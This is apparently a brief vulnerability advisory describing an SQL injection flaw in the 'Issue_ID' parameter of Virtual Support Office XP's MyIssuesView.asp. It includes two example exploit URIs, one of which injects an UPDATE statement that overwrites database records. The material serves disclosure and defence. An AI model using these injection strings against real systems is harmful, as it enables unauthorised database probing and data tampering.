Virtual Support Office XP 'MyIssuesView.asp' SQL Injection Vulnerability

Virtual Support Office XP 'MyIssuesView.asp' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/MyIssuesView.asp?Issue_ID=-1%20having%201=1--
http://www.example.com/MyIssuesView.asp?Issue_ID=-1 update QIssues set column='hacked';--